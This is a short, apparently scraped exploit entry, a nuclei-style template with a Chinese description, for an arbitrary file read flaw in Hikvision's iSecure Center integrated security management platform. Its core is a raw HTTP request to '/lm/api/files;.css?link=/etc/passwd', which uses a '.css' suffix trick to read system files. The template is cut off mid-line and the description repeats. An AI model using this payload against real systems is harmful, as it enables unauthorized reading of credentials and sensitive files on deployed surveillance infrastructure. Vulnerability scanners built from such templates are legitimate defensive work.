name: 海康威视-综合安防管理平台-files-文件读取author: hikvision-files-filereadseverity: high requests:- raw: - | GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1 Host: {{Hostname}} Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows...
## 海康威视-综合安防管理平台-files-文件读取 HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。在其某接口处存在任意文件读取漏洞,攻击者可以读取系统任意敏感文件。 ![4c21a71d9bf1158fb01d135407cc7937](https://github....
##海康威视-综合安防管理平台-files-文件读取 HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。在其某接口处存在任意文件读取漏洞,攻击者可以读取系统任意敏感文件。